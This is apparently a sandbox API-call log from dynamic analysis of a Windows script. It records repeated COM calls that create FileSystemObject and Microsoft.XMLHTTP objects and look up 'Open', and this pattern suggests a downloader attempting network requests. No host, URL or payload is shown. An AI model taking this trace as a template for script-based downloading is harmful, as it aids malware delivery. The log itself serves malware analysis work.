	[0529.481] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0529.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0529.484] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0529.484] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0529.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0529.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0529.484] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0531.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0531.135] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0531.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0531.137] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0531.137] SysStringLen (param_1=0x0) returned 0x0
	[0531.137] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0531.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0531.137] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0531.137] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0531.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0531.137] ??2@YAPEAX_K@Z () returned 0x62f310
	[0531.137] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0531.137] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0531.137] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0531.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0531.137] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0531.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0531.138] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0531.140] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0531.140] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0531.140] SysStringLen (param_1=0x0) returned 0x0
	[0531.140] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0531.140] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0531.140] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0531.140] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0531.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0531.141] ??2@YAPEAX_K@Z () returned 0x62f330
	[0531.141] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0531.141] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0531.141] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0531.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0531.141] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0531.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0531.141] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0531.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0531.141] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0531.141] SysStringLen (param_1=0x0) returned 0x0
	[0531.141] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0531.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0531.142] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0531.142] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0531.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0531.142] ??2@YAPEAX_K@Z () returned 0x62f310
	[0531.142] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0531.142] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0531.142] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0531.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0531.142] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0531.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0531.142] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0531.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0531.142] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0531.142] SysStringLen (param_1=0x0) returned 0x0
	[0531.143] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0531.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0531.143] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0531.143] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0531.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0531.143] ??2@YAPEAX_K@Z () returned 0x62f330
	[0531.143] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0531.143] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0531.143] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0531.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0531.143] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0531.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0531.143] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0531.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0531.143] longjmp () 
	[0531.144] longjmp () 
	[0531.144] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0531.144] SysStringLen (param_1=0x0) returned 0x0
	[0531.144] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0531.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0531.144] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0531.144] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0531.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0531.144] ??2@YAPEAX_K@Z () returned 0x62f310
	[0531.144] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0531.144] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0531.144] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0531.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0531.144] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0531.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0531.144] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0531.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0531.145] longjmp () 
	[0531.145] longjmp () 
	[0531.145] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0531.145] SysStringLen (param_1=0x0) returned 0x0
	[0531.145] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0531.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0531.145] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0531.145] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0531.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0531.145] ??2@YAPEAX_K@Z () returned 0x62f330
	[0531.145] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
